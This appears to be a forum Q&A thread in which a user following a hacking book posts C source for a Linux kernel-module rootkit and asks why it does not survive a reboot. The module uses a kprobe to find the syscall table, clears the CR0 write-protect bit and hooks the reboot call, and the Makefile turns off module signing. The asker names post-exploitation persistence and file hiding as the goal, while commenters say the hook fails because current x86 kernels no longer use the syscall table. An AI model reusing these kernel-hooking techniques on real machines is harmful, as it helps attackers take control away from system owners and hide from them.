How do I keep my kernel module installed?
I'm quite new to Linux, so pardon me. Running Kali Linux 6.8.11-amd64.
I'm following a hacking book and I've reached a section that is dedicated to rootkits. Specifically making a C program to replace the reboot function in the system call table of the kernel with a modified one, which is meant return the EPERM constant that communicates the user doesn't meet the requirements to reboot their system. This would mean a user cannot reboot their kernel when they have the .ko module installed despite being able to attempt a reboot. Here's my module.
#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/syscalls.h>

// Manually set the write bit
static void my_write_cr0(unsigned long value) {
    asm volatile("mov %0, %%cr0" :: "r"(value) : "memory");
}

#define disable_write_protection() my_write_cr0(read_cr0() & (~0x10000))
#define enable_write_protection() my_write_cr0(read_cr0() | (0x10000))
#define enable_reboot 0

unsigned long *sys_call_table_address;
asmlinkage long (*old_reboot_sys_call)(int, int, int, void *);

static struct kprobe kp = {
    .symbol_name = "kallsyms_lookup_name"
};

typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);

unsigned long * get_system_call_table_address(void) {
    kallsyms_lookup_name_t kallsyms_lookup_name;
    int ret = register_kprobe(&kp);
    if (ret < 0) {
        printk(KERN_ALERT "EHROOTKIT: register_kprobe failed, returned %d\n", ret);
        return NULL;
    }
    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
    unregister_kprobe(&kp);
    if (!kallsyms_lookup_name) {
        printk(KERN_ALERT "EHROOTKIT: kallsyms_lookup_name not found\n");
        return NULL;
    }
    return (unsigned long *)kallsyms_lookup_name("sys_call_table");
}

asmlinkage long hackers_reboot(int magic1, int magic2, int cmd, void *arg) {
    if (enable_reboot) {
        return old_reboot_sys_call(magic1, magic2, cmd, arg);
    }
    printk(KERN_NOTICE "EHROOTKIT: Blocked reboot Call");
    return -EPERM;
}

void hook_sys_call(void) {
    old_reboot_sys_call = (void *)sys_call_table_address[__NR_reboot];
    disable_write_protection();
    sys_call_table_address[__NR_reboot] = (unsigned long)hackers_reboot;
    enable_write_protection();
    printk(KERN_NOTICE "EHROOTKIT: Hooked reboot Call");
}

void restore_reboot_sys_call(void) {
    disable_write_protection();
    sys_call_table_address[__NR_reboot] = (unsigned long)old_reboot_sys_call;
    enable_write_protection();
}

static int __init startup(void) {
    printk(KERN_ALERT "EHROOTKIT: ATTEMPTING TO HOOK REBOOT CALL\n");
    sys_call_table_address = get_system_call_table_address();
    if (!sys_call_table_address) {
        printk(KERN_ALERT "EHROOTKIT: Failed to get sys_call_table_address\n");
        return -1;
    }
    hook_sys_call();
    return 0;
}

static void __exit shutdown(void) {
    restore_reboot_sys_call();
}

module_init(startup);
module_exit(shutdown);
MODULE_LICENSE("GPL");

Just FYI I've set CONFIG_MODULE_SIG and CONFIG_MODULE_SIG_ALL off in my Makefile due to previous issues because of module verification failed: signature and/or  required key missing - tainting kernel.
CONFIG_MODULE_SIG=n
CONFIG_MODULE_SIG_ALL=n
obj-m += reboot_blocker.o
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

After installing the kernel module my dmesg says: [ 2206.406603] EHROOTKIT: Hooked reboot Call. I've also received no issues about tainting kernels or signatures.
So far so good, until it wasn't. I reboot via terminal and the book claims only the GUI should reboot but not the kernel. I ping Kali from another device and the pings pause. Afterwards, when doing sudo lsmod the module is no where to be seen. Checking dmesg shows the kernel has clearly reset, no message from EHROOTKIT. Having This begs my question(s):

Is it possible to keep my kernel modules installed after 'rebooting'?

If so, is it the fault of my module not being coded properly? Am I missing something?


This is quite important to me, since post-exploitation to maintain persistence one might have to hide their files and even prevent the kernel from removing modules.

From what I vaguely remember on other questions here, the system calls in Linux on some platforms are now implemented as a switch, instead of directly using the system call table.

Obviously you're doing a full re-boot while the book asks you just to restart the desktop.

You should have seen a "blocked reboot" message upon reboot if your sys call patch had worked. Did you? Likely, not

The sole fact that you succeeded in rebooting should tell you that you did not in fact successfully block rebooting. The issue is as @ThomasJager suggests, syscall tables do not exist anymore on x86. See my answer here: https://stackoverflow.com/a/78607015/3889449.

"I reboot via terminal and the book claims only the GUI should reboot but not the kernel." - this makes little sense. Not sure what book you are reading, but the reboot command (which invokes the reboot syscall) should always reboots the whole system, and "rebooting" the GUI is not really a thing.
